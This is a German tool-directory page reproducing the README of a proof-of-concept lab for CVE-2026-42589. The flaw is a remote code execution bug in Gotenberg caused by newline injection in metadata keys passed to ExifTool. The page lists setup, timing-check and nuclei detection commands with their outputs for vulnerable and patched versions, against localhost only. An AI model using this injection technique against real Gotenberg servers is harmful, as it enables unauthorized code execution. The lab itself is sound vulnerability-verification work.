Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/fineman999/poc_cve-2026-42589
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubfineman999/poc_cve-2026-42589

POC_CVE-2026-42589

POC_CVE-2026-42589

Repository anzeigen
13vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

POC_CVE-2026-42589

Lokales Reproduktionslabor und nuclei-Template-Entwurf für CVE-2026-42589, das Gotenberg betrifft.

Zusammenfassung

CVE-2026-42589 ist ein nicht authentifiziertes Problem mit Remote-Codeausführung in Gotenberg, das durch Newline-Injection in Metadaten-Schlüsseln verursacht wird:

root@kitploit:~
POST /forms/pdfengines/metadata/write

Betroffene Gotenberg-Versionen leiten benutzerkontrollierte Metadaten-Schlüssel ohne Zurückweisung von Steuerzeichen an ExifTool weiter. Ein Metadaten-Schlüssel, der JSON-escapte Newlines enthält, kann in zusätzliche ExifTool-Argumente aufgeteilt werden.

Dieses Labor wurde verwendet, um Folgendes zu validieren:

  • verwundbares Verhalten auf gotenberg/gotenberg:8.29.1
  • gepatchtes Verhalten auf gotenberg/gotenberg:8.31.0

Das nuclei-Template verwendet nur einen nicht-destruktiven sleep 6-Timing-Check.

Referenzen

  • GitHub Advisory: https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
Tool herunterladen
  • Behobene Version: https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
  • ExifTool-Dokumentation: https://exiftool.org/exiftool_pod.html
  • Dateien

    • docker-compose.yml
    • docker-compose.latest.yml
    • CVE-2026-42589.yaml
    • manual_verify.py
    • sample.pdf
    • README.md

    Verwundbarer Test

    Gotenberg 8.29.1 starten:

    root@kitploit:~
    docker compose down -v
    docker compose up -d
    docker compose logs --tail=100 gotenberg
    

    Version prüfen:

    root@kitploit:~
    curl -s http://127.0.0.1:3000/version
    

    Manueller Raw-Multipart-Timing-Check:

    root@kitploit:~
    python3 manual_verify.py http://127.0.0.1:3000
    

    Erwartetes Verwundbarkeits-Signal:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    TOTAL_TIME=6.xs
    

    Beobachtetes Verwundbarkeits-Ergebnis:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    TOTAL_TIME=6.300s
    Internal Server Error
    

    Kontrolle der gepatchten Version

    Gotenberg 8.31.0 starten:

    root@kitploit:~
    docker compose -f docker-compose.latest.yml down -v
    docker compose -f docker-compose.latest.yml up -d
    docker compose -f docker-compose.latest.yml logs --tail=100 gotenberg
    

    Version prüfen:

    root@kitploit:~
    curl -s http://127.0.0.1:3000/version
    

    Denselben manuellen Timing-Check ausführen:

    root@kitploit:~
    python3 manual_verify.py http://127.0.0.1:3000
    

    Beobachtetes Ergebnis der gepatchten Version:

    root@kitploit:~
    HTTP/1.1 400 Bad Request
    TOTAL_TIME=0.145s
    At least one PDF engine cannot process the requested metadata, while others may have failed to convert due to different issues
    

    Nuclei

    Template validieren:

    root@kitploit:~
    nuclei -duc -validate -t CVE-2026-42589.yaml
    

    Gegen das verwundbare Ziel ausführen:

    root@kitploit:~
    nuclei -duc -u http://127.0.0.1:3000 -t CVE-2026-42589.yaml
    

    Erwartetes Verhalten:

    • 8.29.1: Treffer nach der verzögerten 500-Antwort
    • 8.31.0: kein Treffer

    Beobachtetes Verwundbarkeits-Ergebnis:

    root@kitploit:~
    [CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
    [INF] Scan completed in 6.245907708s. 1 matches found.
    

    Beobachtetes Ergebnis der gepatchten Version:

    root@kitploit:~
    [INF] Scan completed in 93.01425ms. No results found.
    

    Hinweise

    • Dieses Labor vermeidet absichtlich Datei-Schreibvorgänge, Reverse Shells und Out-of-Band-Callbacks.
    • Das Template erkennt Verhalten, nicht nur ein Versions-Banner.
    • Es wurden keine realen Ziele verwendet.
    • Nur auf Systemen verwenden, die dir gehören oder für die du ausdrücklich autorisiert bist, Tests durchzuführen.